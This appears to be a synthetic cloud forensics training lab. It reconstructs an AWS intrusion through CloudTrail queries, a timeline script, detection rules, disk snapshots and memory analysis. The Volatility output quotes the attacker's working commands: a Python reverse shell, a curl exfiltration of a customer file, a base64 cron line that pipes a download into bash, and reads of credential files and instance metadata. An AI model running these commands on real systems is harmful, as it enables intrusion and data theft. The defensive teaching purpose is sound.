# SYNTHETIC query ID returned:
# { "queryId": "a1b2c3d4-5678-90ab-cdef-aaaaaaaaaaaa" }
# Retrieve results (SYNTHETIC)
$ aws logs get-query-results --query-id a1b2c3d4-5678-90ab-cdef-aaaaaaaaaaaa --profile forensics
# SYNTHETIC OUTPUT — API Gateway access from attacker:
{
"results": [
[
{"field": "@timestamp", "value": "2026-03-24 15:10:22.000"},
{"field": "@message", "value": "GET /api/v2/accounts HTTP/1.1 200 sourceIp=203.0.113.42 userAgent=python-requests/2.31.0"}
],
[
{"field": "@timestamp", "value": "2026-03-24 15:11:05.000"},
{"field": "@message", "value": "GET /api/v2/accounts/export?format=csv HTTP/1.1 200 sourceIp=203.0.113.42 userAgent=python-requests/2.31.0"}
],
[
{"field": "@timestamp", "value": "2026-03-24 15:12:33.000"},
{"field": "@message", "value": "GET /api/v2/transactions?startDate=2026-01-01&limit=10000 HTTP/1.1 200 sourceIp=203.0.113.42 userAgent=python-requests/2.31.0"}
]
],
"statistics": {
"recordsMatched": 47.0,
"recordsScanned": 1250000.0,
"bytesScanned": 892000000.0
},
"status": "Complete"
}
# Query for unusual SSM (Systems Manager) activity — potential lateral movement
$ aws logs start-query \
--log-group-name "/aws/ssm/session-manager" \
--start-time $(date -d "2026-03-24" +%s) \
--end-time $(date -d "2026-03-25" +%s) \
--query-string 'fields @timestamp, target, sessionOwner, @message
| filter sessionOwner like /dev-jenkins/
| sort @timestamp asc' \
--profile forensics
# SYNTHETIC OUTPUT:
{
"results": [
[
{"field": "@timestamp", "value": "2026-03-24 15:55:12.000"},
{"field": "target", "value": "i-0a1b2c3d4e5f6789a"},
{"field": "sessionOwner", "value": "arn:aws:iam::123456789012:user/dev-jenkins-ci"},
{"field": "@message", "value": "Session started to instance i-0a1b2c3d4e5f6789a from 203.0.113.42"}
]
],
"statistics": {
"recordsMatched": 1.0,
"recordsScanned": 15000.0,
"bytesScanned": 8500000.0
},
"status": "Complete"
}
# FINDING: Attacker used SSM Session Manager to access the API Gateway
# instance (i-0a1b2c3d4e5f6789a) at 15:55 UTC
Step 1.6: Timeline Reconstruction Script¶
#!/usr/bin/env python3
"""
CloudTrail Timeline Reconstruction Script
Case: QFS-IR-2026-0042
All data is 100% SYNTHETIC
"""
import json
from datetime import datetime
from collections import defaultdict
# SYNTHETIC CloudTrail events for the compromised account from 203.0.113.42
attacker_events = [
# Phase 1: Reconnaissance (14:28 - 14:34)
{"time": "2026-03-24T14:28:11Z", "api": "GetCallerIdentity", "service": "sts", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:28:15Z", "api": "ListAttachedUserPolicies", "service": "iam", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:28:18Z", "api": "ListGroupsForUser", "service": "iam", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:28:22Z", "api": "ListAccessKeys", "service": "iam", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:29:01Z", "api": "ListUsers", "service": "iam", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:29:35Z", "api": "ListRoles", "service": "iam", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:30:12Z", "api": "DescribeInstances", "service": "ec2", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:30:45Z", "api": "DescribeVpcs", "service": "ec2", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:30:58Z", "api": "DescribeSubnets", "service": "ec2", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:31:22Z", "api": "DescribeSecurityGroups", "service": "ec2", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:31:55Z", "api": "DescribeVolumes", "service": "ec2", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:32:10Z", "api": "ListBuckets", "service": "s3", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:32:44Z", "api": "GetBucketAcl", "service": "s3", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:33:01Z", "api": "GetBucketPolicy", "service": "s3", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:34:22Z", "api": "ListSecrets", "service": "secretsmanager", "status": "SUCCESS", "phase": "Reconnaissance"},
{"time": "2026-03-24T14:34:55Z", "api": "GetSecretValue", "service": "secretsmanager", "status": "SUCCESS", "phase": "Credential Access"},
# Phase 2: Persistence & Privilege Escalation (14:36 - 14:42)
{"time": "2026-03-24T14:36:12Z", "api": "CreateAccessKey", "service": "iam", "status": "SUCCESS", "phase": "Persistence"},
{"time": "2026-03-24T14:38:00Z", "api": "AssumeRole", "service": "sts", "status": "AccessDenied", "phase": "PrivEsc Attempt"},
{"time": "2026-03-24T14:38:15Z", "api": "AssumeRole", "service": "sts", "status": "AccessDenied", "phase": "PrivEsc Attempt"},
{"time": "2026-03-24T14:40:22Z", "api": "RunInstances", "service": "ec2", "status": "SUCCESS", "phase": "Resource Hijacking"},
# Phase 3: Data Access & Exfiltration Prep (15:00 - 15:15)
{"time": "2026-03-24T15:02:33Z", "api": "PutBucketPolicy", "service": "s3", "status": "SUCCESS", "phase": "Exfiltration Prep"},
{"time": "2026-03-24T15:05:00Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Access"},
{"time": "2026-03-24T15:05:15Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Access"},
{"time": "2026-03-24T15:05:30Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Access"},
{"time": "2026-03-24T15:10:22Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Access"},
# Phase 4: Lateral Movement via SSM (15:55)
{"time": "2026-03-24T15:55:12Z", "api": "StartSession", "service": "ssm", "status": "SUCCESS", "phase": "Lateral Movement"},
# Phase 5: Anti-Forensics Attempt (15:47)
{"time": "2026-03-24T15:47:22Z", "api": "StopLogging", "service": "cloudtrail", "status": "AccessDenied", "phase": "Anti-Forensics"},
{"time": "2026-03-24T15:48:05Z", "api": "DeleteTrail", "service": "cloudtrail", "status": "AccessDenied", "phase": "Anti-Forensics"},
# Phase 6: Continued Data Exfiltration (16:00 - 18:22)
{"time": "2026-03-24T16:00:00Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Exfiltration"},
{"time": "2026-03-24T16:15:00Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Exfiltration"},
{"time": "2026-03-24T17:30:00Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Exfiltration"},
{"time": "2026-03-24T18:22:05Z", "api": "GetObject", "service": "s3", "status": "SUCCESS", "phase": "Data Exfiltration"},
]
# Build timeline report
print("=" * 80)
print(f"CASE: QFS-IR-2026-0042 — AWS CloudTrail Attacker Timeline")
print(f"Account: dev-jenkins-ci | Source IP: 203.0.113.42 (SYNTHETIC)")
print(f"Period: 2026-03-24T14:28:11Z to 2026-03-24T18:22:05Z")
print("=" * 80)
print()
# Group by phase
phases = defaultdict(list)
for event in sorted(attacker_events, key=lambda x: x["time"]):
phases[event["phase"]].append(event)
for phase, events in phases.items():
print(f"\n--- {phase} ({len(events)} events) ---")
for e in events:
status_icon = "[+]" if e["status"] == "SUCCESS" else "[!]"
print(f" {status_icon} {e['time']} | {e['service']:20s} | {e['api']:35s} | {e['status']}")
# Summary statistics
print("\n" + "=" * 80)
print("SUMMARY")
print("=" * 80)
service_counts = defaultdict(int)
for e in attacker_events:
service_counts[e["service"]] += 1
print(f"\nTotal API calls from attacker IP: {len(attacker_events)}")
print(f"Duration: ~3h 54m")
print(f"\nAPI calls by service:")
for svc, count in sorted(service_counts.items(), key=lambda x: -x[1]):
print(f" {svc:25s}: {count}")
print(f"\nKey Findings:")
print(f" 1. Attacker performed systematic IAM and infrastructure reconnaissance")
print(f" 2. Created a persistence access key (CreateAccessKey at 14:36)")
print(f" 3. Failed privilege escalation via AssumeRole (2 attempts)")
print(f" 4. Modified S3 bucket policy to allow public access (data exfil prep)")
print(f" 5. Accessed Secrets Manager to retrieve stored credentials")
print(f" 6. Used SSM Session Manager for lateral movement to EC2 instance")
print(f" 7. Attempted to disable CloudTrail logging (anti-forensics, denied)")
print(f" 8. Exfiltrated data from S3 data lake over ~2.5 hours")
print(f"\n{'='*80}")
print("ALL DATA IN THIS TIMELINE IS 100% SYNTHETIC")
print(f"{'='*80}")
Step 1.7: Evidence Chain of Custody Documentation¶
# ============================================================
# Step 1.7: Chain of Custody Record for CloudTrail Evidence
# ============================================================
$ cat > ~/cloud-dfir-lab24/chain-of-custody/coc-001-cloudtrail.json << 'COC_EOF'
{
"chain_of_custody_record": {
"record_id": "COC-QFS-2026-0042-001",
"case_id": "QFS-IR-2026-0042",
"evidence_description": "AWS CloudTrail logs from account 123456789012, us-east-1, date range 2026-03-22 to 2026-03-25",
"evidence_type": "Cloud API Audit Logs",
"source_location": "s3://qfs-cloudtrail-123456789012/AWSLogs/123456789012/CloudTrail/us-east-1/2026/03/",
"custody_entries": [
{
"sequence": 1,
"datetime": "2026-03-24T16:00:00Z",
"action": "Acquired",
"handler": "forensic-analyst@quantumfinancial.example.com",
"handler_title": "Senior DFIR Analyst",
"method": "AWS CLI s3 sync with --exact-timestamps",
"destination": "~/cloud-dfir-lab24/evidence/aws/cloudtrail/raw/",
"integrity_hash": "SHA-256 manifest: evidence_hashes_raw.sha256",
"file_count": 4287,
"total_size": "189 MB",
"notes": "CloudTrail log integrity validation passed: 72/72 digests valid, 4287/4287 files valid. Downloaded over encrypted TLS connection."
},
{
"sequence": 2,
"datetime": "2026-03-24T16:15:00Z",
"action": "Processed",
"handler": "forensic-analyst@quantumfinancial.example.com",
"handler_title": "Senior DFIR Analyst",
"method": "Decompressed and merged with jq",
"destination": "~/cloud-dfir-lab24/evidence/aws/cloudtrail/cloudtrail_20260324_merged.json",
"integrity_hash": "SHA-256: a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2",
"notes": "Merged logs for 2026-03-24 for timeline analysis. Original compressed files preserved separately."
},
{
"sequence": 3,
"datetime": "2026-03-24T17:30:00Z",
"action": "Analyzed",
"handler": "forensic-analyst@quantumfinancial.example.com",
"handler_title": "Senior DFIR Analyst",
"method": "Python timeline reconstruction script",
"destination": "~/cloud-dfir-lab24/evidence/aws/cloudtrail/attacker_timeline_aws.json",
"notes": "Extracted 235 attacker API calls from 203.0.113.42. Timeline report generated."
}
],
"storage_location": "Encrypted forensic workstation (LUKS volume, AES-256)",
"access_control": "Restricted to IR team members only",
"retention_period": "7 years per financial regulatory requirement",
"synthetic_notice": "THIS IS A SYNTHETIC TRAINING RECORD — NOT A REAL INVESTIGATION"
}
}
COC_EOF
echo "[+] Chain of custody record COC-001 created"
Exercise 1 Detection Queries¶
// -----------------------------------------------------------------
// Detection: Suspicious CloudTrail API Reconnaissance Pattern
// Case: QFS-IR-2026-0042 | MITRE: T1087.004, T1580
// -----------------------------------------------------------------
let ReconAPIs = dynamic([
"GetCallerIdentity", "ListUsers", "ListRoles",
"ListAttachedUserPolicies", "ListGroupsForUser",
"DescribeInstances", "DescribeVpcs", "DescribeSubnets",
"DescribeSecurityGroups", "ListBuckets"
]);
AWSCloudTrail
| where TimeGenerated > ago(24h)
| where EventName in (ReconAPIs)
| summarize
ReconAPICount = dcount(EventName),
APIList = make_set(EventName),
TotalCalls = count(),
FirstCall = min(TimeGenerated),
LastCall = max(TimeGenerated),
SourceIPs = make_set(SourceIpAddress)
by UserIdentityArn, UserIdentityUserName
| where ReconAPICount >= 6
| extend DurationMinutes = datetime_diff('minute', LastCall, FirstCall)
| where DurationMinutes <= 30
| project
UserIdentityUserName,
UserIdentityArn,
ReconAPICount,
TotalCalls,
DurationMinutes,
FirstCall,
LastCall,
SourceIPs,
APIList
// -----------------------------------------------------------------
// Detection: CloudTrail Tampering Attempt (Anti-Forensics)
// MITRE: T1562.008 — Disable or Modify Cloud Logs
// -----------------------------------------------------------------
AWSCloudTrail
| where TimeGenerated > ago(7d)
| where EventName in (
"StopLogging", "DeleteTrail", "UpdateTrail",
"PutEventSelectors", "DeleteEventDataStore",
"StopEventDataStoreIngestion"
)
| project
TimeGenerated,
EventName,
UserIdentityUserName,
UserIdentityArn,
SourceIpAddress,
ErrorCode,
ErrorMessage,
RequestParameters
| order by TimeGenerated asc
// -----------------------------------------------------------------
// Detection: New IAM Access Key Creation (Persistence)
// MITRE: T1098.001 — Account Manipulation: Additional Cloud Credentials
// -----------------------------------------------------------------
AWSCloudTrail
| where TimeGenerated > ago(24h)
| where EventName == "CreateAccessKey"
| where ErrorCode == ""
| project
TimeGenerated,
UserIdentityUserName,
SourceIpAddress,
UserAgent,
TargetUser = tostring(parse_json(RequestParameters).userName),
ResponseAccessKeyId = tostring(parse_json(ResponseElements).accessKey.accessKeyId)
| join kind=leftanti (
// Exclude known automation
datatable(SourceIpAddress: string) [
"10.100.2.50", // Jenkins server (SYNTHETIC)
"10.50.1.10" // Bastion host (SYNTHETIC)
]
) on SourceIpAddress
// -----------------------------------------------------------------
// Detection: S3 Bucket Policy Made Public (Data Exfiltration Prep)
// MITRE: T1530 — Data from Cloud Storage
// -----------------------------------------------------------------
AWSCloudTrail
| where TimeGenerated > ago(7d)
| where EventName in ("PutBucketPolicy", "PutBucketAcl", "PutPublicAccessBlock")
| extend PolicyText = tostring(parse_json(RequestParameters).policy)
| where PolicyText contains "\"Principal\":\"*\"" or
PolicyText contains "\"Principal\":{\"AWS\":\"*\"}"
| project
TimeGenerated,
EventName,
UserIdentityUserName,
SourceIpAddress,
BucketName = tostring(parse_json(RequestParameters).bucketName),
PolicyText,
UserAgent
// -----------------------------------------------------------------
// Detection: Suspicious CloudTrail API Reconnaissance Pattern
// Case: QFS-IR-2026-0042 | MITRE: T1087.004, T1580
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail"
(eventName="GetCallerIdentity" OR eventName="ListUsers" OR
eventName="ListRoles" OR eventName="ListAttachedUserPolicies" OR
eventName="ListGroupsForUser" OR eventName="DescribeInstances" OR
eventName="DescribeVpcs" OR eventName="DescribeSubnets" OR
eventName="DescribeSecurityGroups" OR eventName="ListBuckets")
earliest=-24h
| stats
dc(eventName) as ReconAPICount,
values(eventName) as APIList,
count as TotalCalls,
min(_time) as FirstCall,
max(_time) as LastCall,
values(sourceIPAddress) as SourceIPs
by userIdentity.arn, userIdentity.userName
| where ReconAPICount >= 6
| eval DurationMinutes = round((LastCall - FirstCall) / 60, 1)
| where DurationMinutes <= 30
| convert ctime(FirstCall) ctime(LastCall)
| table userIdentity.userName, userIdentity.arn, ReconAPICount,
TotalCalls, DurationMinutes, FirstCall, LastCall, SourceIPs, APIList
// -----------------------------------------------------------------
// Detection: CloudTrail Tampering Attempt (Anti-Forensics)
// MITRE: T1562.008 — Disable or Modify Cloud Logs
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail"
(eventName="StopLogging" OR eventName="DeleteTrail" OR
eventName="UpdateTrail" OR eventName="PutEventSelectors" OR
eventName="DeleteEventDataStore" OR
eventName="StopEventDataStoreIngestion")
earliest=-7d
| table _time, eventName, userIdentity.userName, userIdentity.arn,
sourceIPAddress, errorCode, errorMessage, requestParameters
// -----------------------------------------------------------------
// Detection: New IAM Access Key Creation (Persistence)
// MITRE: T1098.001 — Account Manipulation: Additional Cloud Credentials
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail" eventName="CreateAccessKey"
NOT errorCode=*
earliest=-24h
| eval TargetUser=spath(requestParameters, "userName")
| eval NewKeyId=spath(responseElements, "accessKey.accessKeyId")
| search NOT sourceIPAddress IN ("10.100.2.50", "10.50.1.10")
| table _time, userIdentity.userName, sourceIPAddress, userAgent,
TargetUser, NewKeyId
// -----------------------------------------------------------------
// Detection: S3 Bucket Policy Made Public (Data Exfiltration Prep)
// MITRE: T1530 — Data from Cloud Storage
// -----------------------------------------------------------------
index=aws sourcetype="aws:cloudtrail"
(eventName="PutBucketPolicy" OR eventName="PutBucketAcl" OR
eventName="PutPublicAccessBlock")
earliest=-7d
| eval PolicyText=spath(requestParameters, "policy")
| eval BucketName=spath(requestParameters, "bucketName")
| where like(PolicyText, "%\"Principal\":\"*\"%") OR
like(PolicyText, "%\"Principal\":{\"AWS\":\"*\"}%")
| table _time, eventName, userIdentity.userName, sourceIPAddress,
BucketName, PolicyText, userAgent
Exercise 2: AWS EC2 Instance Forensic Acquisition¶
Exercise Objective
Perform forensic acquisition of the compromised AWS EC2 instance (API Gateway server). Create EBS snapshots for disk evidence preservation, acquire volatile memory using SSM Run Command, mount disk images read-only for analysis, and examine VPC Flow Logs and S3 access logs to identify data exfiltration patterns.
MITRE ATT&CK Techniques:
- T1059.004 -- Command and Scripting Interpreter: Unix Shell
- T1005 -- Data from Local System
- T1048 -- Exfiltration Over Alternative Protocol
- T1071.001 -- Application Layer Protocol: Web Protocols
- T1570 -- Lateral Tool Transfer
Step 2.1: EBS Snapshot Creation for Evidence Preservation¶
# ============================================================
# Step 2.1: Create EBS Snapshots of Compromised Instance
# Preserves disk state for forensic analysis
# ============================================================
# Identify volumes attached to the compromised instance
$ aws ec2 describe-instances \
--instance-ids i-0a1b2c3d4e5f6789a \
--profile forensics \
--region us-east-1 \
--query 'Reservations[].Instances[].{
InstanceId: InstanceId,
State: State.Name,
LaunchTime: LaunchTime,
PrivateIp: PrivateIpAddress,
SubnetId: SubnetId,
SecurityGroups: SecurityGroups[].GroupId,
Volumes: BlockDeviceMappings[].{
DeviceName: DeviceName,
VolumeId: Ebs.VolumeId,
AttachTime: Ebs.AttachTime,
Status: Ebs.Status
}
}'
# SYNTHETIC OUTPUT:
[
{
"InstanceId": "i-0a1b2c3d4e5f6789a",
"State": "running",
"LaunchTime": "2025-08-15T12:00:00+00:00",
"PrivateIp": "10.100.1.15",
"SubnetId": "subnet-prod-web",
"SecurityGroups": ["sg-0a1b2c3d4e5f0001"],
"Volumes": [
{
"DeviceName": "/dev/xvda",
"VolumeId": "vol-0a1b2c3d4e5f0001",
"AttachTime": "2025-08-15T12:00:30+00:00",
"Status": "attached"
},
{
"DeviceName": "/dev/xvdf",
"VolumeId": "vol-0a1b2c3d4e5f0002",
"AttachTime": "2025-08-20T09:00:00+00:00",
"Status": "attached"
}
]
}
]
# Create forensic snapshots of both volumes with case tagging
$ aws ec2 create-snapshot \
--volume-id vol-0a1b2c3d4e5f0001 \
--description "FORENSIC: Case QFS-IR-2026-0042 | Root volume of i-0a1b2c3d4e5f6789a | Acquired 2026-03-24T16:30Z" \
--tag-specifications 'ResourceType=snapshot,Tags=[
{Key=CaseId,Value=QFS-IR-2026-0042},
{Key=EvidenceType,Value=disk-image},
{Key=SourceInstance,Value=i-0a1b2c3d4e5f6789a},
{Key=SourceVolume,Value=vol-0a1b2c3d4e5f0001},
{Key=AcquiredBy,Value=forensic-analyst},
{Key=Classification,Value=CONFIDENTIAL},
{Key=DoNotDelete,Value=true}
]' \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
{
"SnapshotId": "snap-0a1b2c3d4e5f0001",
"VolumeId": "vol-0a1b2c3d4e5f0001",
"State": "pending",
"VolumeSize": 50,
"StartTime": "2026-03-24T16:30:22.000Z",
"Description": "FORENSIC: Case QFS-IR-2026-0042 | Root volume of i-0a1b2c3d4e5f6789a | Acquired 2026-03-24T16:30Z",
"Encrypted": true
}
# Create snapshot of the data volume
$ aws ec2 create-snapshot \
--volume-id vol-0a1b2c3d4e5f0002 \
--description "FORENSIC: Case QFS-IR-2026-0042 | Data volume of i-0a1b2c3d4e5f6789a | Acquired 2026-03-24T16:31Z" \
--tag-specifications 'ResourceType=snapshot,Tags=[
{Key=CaseId,Value=QFS-IR-2026-0042},
{Key=EvidenceType,Value=disk-image},
{Key=SourceInstance,Value=i-0a1b2c3d4e5f6789a},
{Key=SourceVolume,Value=vol-0a1b2c3d4e5f0002},
{Key=AcquiredBy,Value=forensic-analyst},
{Key=Classification,Value=CONFIDENTIAL},
{Key=DoNotDelete,Value=true}
]' \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
{
"SnapshotId": "snap-0a1b2c3d4e5f0002",
"VolumeId": "vol-0a1b2c3d4e5f0002",
"State": "pending",
"VolumeSize": 200,
"StartTime": "2026-03-24T16:31:05.000Z",
"Encrypted": true
}
# Monitor snapshot progress
$ aws ec2 describe-snapshots \
--snapshot-ids snap-0a1b2c3d4e5f0001 snap-0a1b2c3d4e5f0002 \
--profile forensics \
--region us-east-1 \
--query 'Snapshots[].{Id:SnapshotId,State:State,Progress:Progress,Size:VolumeSize}'
# SYNTHETIC OUTPUT:
[
{"Id": "snap-0a1b2c3d4e5f0001", "State": "completed", "Progress": "100%", "Size": 50},
{"Id": "snap-0a1b2c3d4e5f0002", "State": "completed", "Progress": "100%", "Size": 200}
]
# Protect snapshots from accidental deletion
$ aws ec2 modify-snapshot-attribute \
--snapshot-id snap-0a1b2c3d4e5f0001 \
--create-volume-permission '{"Add":[]}' \
--profile forensics \
--region us-east-1
echo "[+] Forensic snapshots created and protected"
echo "[+] snap-0a1b2c3d4e5f0001 (root, 50 GB)"
echo "[+] snap-0a1b2c3d4e5f0002 (data, 200 GB)"
Step 2.2: Memory Acquisition Using SSM Run Command¶
# ============================================================
# Step 2.2: Volatile Memory Acquisition via SSM + AVML
# Captures RAM contents before they are lost
# ============================================================
# IMPORTANT: Memory acquisition is time-sensitive.
# The longer you wait, the more evidence degrades.
# Use SSM Run Command to avoid SSH (which would alter evidence).
# Step 1: Deploy AVML (Acquire Volatile Memory for Linux) via SSM
$ aws ssm send-command \
--instance-ids i-0a1b2c3d4e5f6789a \
--document-name "AWS-RunShellScript" \
--comment "FORENSIC: Case QFS-IR-2026-0042 Memory Acquisition" \
--parameters '{
"commands": [
"#!/bin/bash",
"# FORENSIC MEMORY ACQUISITION — Case QFS-IR-2026-0042",
"# All data is SYNTHETIC",
"",
"# Create forensic output directory",
"mkdir -p /tmp/forensic-evidence",
"",
"# Download AVML (Acquire Volatile Memory for Linux)",
"# In production, pre-stage AVML in a trusted S3 bucket",
"curl -L -o /tmp/avml https://github.com/microsoft/avml/releases/download/v0.14.0/avml",
"chmod +x /tmp/avml",
"",
"# Record pre-acquisition metadata",
"echo \"=== SYSTEM INFO ===\" > /tmp/forensic-evidence/pre-acquisition.txt",
"date -u >> /tmp/forensic-evidence/pre-acquisition.txt",
"uname -a >> /tmp/forensic-evidence/pre-acquisition.txt",
"cat /proc/meminfo >> /tmp/forensic-evidence/pre-acquisition.txt",
"ps aux >> /tmp/forensic-evidence/pre-acquisition.txt",
"netstat -tlnp >> /tmp/forensic-evidence/pre-acquisition.txt",
"ss -tlnp >> /tmp/forensic-evidence/pre-acquisition.txt",
"",
"# Acquire memory dump",
"/tmp/avml /tmp/forensic-evidence/memory.lime",
"",
"# Generate SHA-256 hash of memory dump",
"sha256sum /tmp/forensic-evidence/memory.lime > /tmp/forensic-evidence/memory.lime.sha256",
"",
"# Compress and upload to forensic S3 bucket",
"pigz -k /tmp/forensic-evidence/memory.lime",
"aws s3 cp /tmp/forensic-evidence/memory.lime.gz s3://qfs-forensic-evidence-123456789012/QFS-IR-2026-0042/memory/i-0a1b2c3d4e5f6789a-memory.lime.gz",
"aws s3 cp /tmp/forensic-evidence/memory.lime.sha256 s3://qfs-forensic-evidence-123456789012/QFS-IR-2026-0042/memory/i-0a1b2c3d4e5f6789a-memory.lime.sha256",
"aws s3 cp /tmp/forensic-evidence/pre-acquisition.txt s3://qfs-forensic-evidence-123456789012/QFS-IR-2026-0042/memory/i-0a1b2c3d4e5f6789a-pre-acquisition.txt",
"",
"# Record completion",
"echo \"Memory acquisition complete: $(date -u)\"",
"echo \"Memory dump size: $(ls -lh /tmp/forensic-evidence/memory.lime | awk '{print $5}')\"",
"echo \"SHA-256: $(cat /tmp/forensic-evidence/memory.lime.sha256)\""
]
}' \
--timeout-seconds 600 \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
{
"Command": {
"CommandId": "cmd-0a1b2c3d4e5f6789a",
"InstanceIds": ["i-0a1b2c3d4e5f6789a"],
"Comment": "FORENSIC: Case QFS-IR-2026-0042 Memory Acquisition",
"Status": "InProgress",
"RequestedDateTime": "2026-03-24T16:35:00.000Z"
}
}
# Check command status
$ aws ssm get-command-invocation \
--command-id cmd-0a1b2c3d4e5f6789a \
--instance-id i-0a1b2c3d4e5f6789a \
--profile forensics \
--region us-east-1
# SYNTHETIC OUTPUT:
{
"Status": "Success",
"StandardOutputContent": "Memory acquisition complete: Tue Mar 24 16:42:33 UTC 2026\nMemory dump size: 16G\nSHA-256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 /tmp/forensic-evidence/memory.lime",
"StandardErrorContent": ""
}
# Download the memory dump to the forensic workstation
$ aws s3 cp \
s3://qfs-forensic-evidence-123456789012/QFS-IR-2026-0042/memory/i-0a1b2c3d4e5f6789a-memory.lime.gz \
~/cloud-dfir-lab24/evidence/aws/memory/ \
--profile forensics
# Verify integrity
$ sha256sum ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime.gz
# e3b0c44298fc1c149afbf4c8996fb924... (SYNTHETIC hash)
echo "[+] Memory acquisition complete — 16 GB memory dump acquired"
Step 2.3: Memory Analysis with Volatility3¶
# ============================================================
# Step 2.3: Analyze Memory Dump with Volatility3
# Look for attacker processes, network connections, injected code
# ============================================================
# Decompress the memory dump
$ pigz -d ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime.gz
# Identify the OS profile
$ vol -f ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime \
banners.Banners
# SYNTHETIC OUTPUT:
# Volatility 3 Framework 2.5.2
# Offset Banner
# 0x5a000000 Linux version 5.15.0-1056-aws (buildd@lcy02-amd64-086)
# (gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0) #61-Ubuntu SMP
# List all running processes
$ vol -f ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime \
linux.pslist.PsList
# SYNTHETIC OUTPUT:
# PID PPID COMM OFFSET
# 1 0 systemd 0x888800001000
# 2 0 kthreadd 0x888800002000
# ...
# 1842 1 nginx 0x888810042000
# 1843 1842 nginx 0x888810043000
# 1844 1842 nginx 0x888810044000
# 2156 1 node 0x888820056000
# 2890 1 sshd 0x888830078000
# 3401 2890 sshd 0x888840090000
# 3402 3401 bash 0x888840091000
# 3450 3402 python3 0x8888400a2000 <-- SUSPICIOUS
# 3451 3450 curl 0x8888400a3000 <-- SUSPICIOUS
# 3678 1 cron 0x888850010000
# 4012 3678 sh 0x888860020000
# 4013 4012 base64 0x888860021000 <-- SUSPICIOUS
# 4201 1 amazon-ssm-agen 0x888870030000
# Check network connections
$ vol -f ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime \
linux.sockstat.Sockstat
# SYNTHETIC OUTPUT:
# PID Protocol Local Address Remote Address State
# 1842 TCP 10.100.1.15:80 0.0.0.0:0 LISTEN
# 1842 TCP 10.100.1.15:443 0.0.0.0:0 LISTEN
# 2156 TCP 10.100.1.15:3000 0.0.0.0:0 LISTEN
# 3450 TCP 10.100.1.15:45678 203.0.113.42:4443 ESTABLISHED <-- C2
# 3451 TCP 10.100.1.15:45679 198.51.100.99:443 ESTABLISHED <-- EXFIL
# 2890 TCP 10.100.1.15:22 0.0.0.0:0 LISTEN
# FINDING: Process 3450 (python3) has an ESTABLISHED connection to the
# attacker IP 203.0.113.42 on port 4443 — this is a reverse shell or C2 channel
# Extract suspicious process command lines
$ vol -f ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime \
linux.psaux.PsAux | grep -E "345[0-1]|401[2-3]"
# SYNTHETIC OUTPUT:
# 3450 3402 python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('203.0.113.42',4443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"
# 3451 3450 curl -s https://198.51.100.99/exfil --data-binary @/tmp/.staging/customer_export.csv.gz
# 4012 3678 sh -c 'echo "Y3VybCAtcyBodHRwczovLzE5OC41MS4xMDAuOTkvYzIgfCBiYXNo" | base64 -d | bash'
# 4013 4012 base64 -d
# CRITICAL FINDINGS FROM MEMORY:
# 1. PID 3450: Python reverse shell connecting to 203.0.113.42:4443
# 2. PID 3451: curl exfiltrating data to 198.51.100.99
# 3. PID 4012: Cron job executing base64-encoded command (persistence)
# 4. The encoded command decodes to: curl -s https://198.51.100.99/c2 | bash
# Extract the bash history from memory
$ vol -f ~/cloud-dfir-lab24/evidence/aws/memory/i-0a1b2c3d4e5f6789a-memory.lime \
linux.bash.Bash
# SYNTHETIC OUTPUT:
# PID Command Time Command
# 3402 2026-03-24 15:55:30.000000 whoami
# 3402 2026-03-24 15:55:35.000000 id
# 3402 2026-03-24 15:55:40.000000 uname -a
# 3402 2026-03-24 15:56:00.000000 cat /etc/passwd
# 3402 2026-03-24 15:56:15.000000 ls -la /opt/qfs-api/
# 3402 2026-03-24 15:56:30.000000 cat /opt/qfs-api/.env
# 3402 2026-03-24 15:57:00.000000 env | grep -i aws
# 3402 2026-03-24 15:57:15.000000 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
